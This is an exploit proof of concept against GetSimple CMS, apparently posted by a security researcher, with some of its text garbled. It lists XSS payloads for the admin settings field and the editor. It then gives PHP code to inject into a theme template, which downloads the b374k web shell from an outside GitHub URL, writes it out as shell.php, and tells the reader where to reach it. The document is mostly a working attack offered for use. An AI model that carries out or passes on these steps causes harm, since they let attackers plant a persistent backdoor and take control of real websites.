_ _ _ _______ __________________ _______ ( ( /||\ /|( \ ( \ ( ____ \\__ __/\__ __/( ____ \ | \ ( || ) ( || ( | ( | ( \/ ) ( ) ( | ( \/ | \ | || | | || | | | | (_____ | | | | | (__ | (\ \) || | | || | | | (_____ ) | | | | | __) | | \ || | | || | | | ) | | | | | | ( | ) \ || (___) || (____/\| (____/Y\____) |___) (___ | | | (____/\ |/ )_)(_______)(_______/(_______|_______)\_______/ )_( (_______/ #Author: Emiliano Febbi (*emilianofebbi.1994@gmail.com*) #Web Site Creator => https://get-simple.info/ #Dork => ??? #CMS => GetSimple CMS (last version) #Vulnz => XSS/File injection #Date => 25/03/2023 *PoC* _______________________________________________ 1# http://www.site.com/cms/admin/settings.php | _______________________________________________|______________ _____________________ ________________________________ _________ inside input text *WebSite URL:* try "http://www.site.com/cms/'>">\>" <= [*XSS*] | -------------------------------------------------------------------------------------------------------------------------------| _______________________________________________________________________________ 2# http://www.site.com/cms/admin/edit.php?id=index&upd=edit-success&type=edit |*XSS* _______________________________________________________________________________|_______ inside the *editor textarea* write "123" and later click on "source" | now result:
123
| you add this ** | complete string:123
<= (all need manually) | --------------------------------------------------------------------------------------- ---------------------------- #3 External File injection |: ____________________________ -Go to *http://www.site.com/cms/admin/theme-edit.php?t=Innovation&f=template.php* -Edit the template file with editor - inject this code above the page: [code] $shellz = file_get_contents('https://raw.githubusercontent.com/NSAKEY/Top-103-shells/master/Top%20103%20shells/b374k-mini-shell-php.php.txt'); $yes = "shell.php"; $fp = fopen($yes,"a"); fputs ($fp," $shellz "); fclose($fp); ?> [/code] - save the changes and go to address *http://www.site.come/cms/theme/Innovation/template.php* - now the shell was injected , go to address *http://www.site.com/cms/theme/Innovation/shell.php* ----------------------------------------------------------------------------------------------------- ._________. */ ///______I ) . /_(_) /__/*PoC End*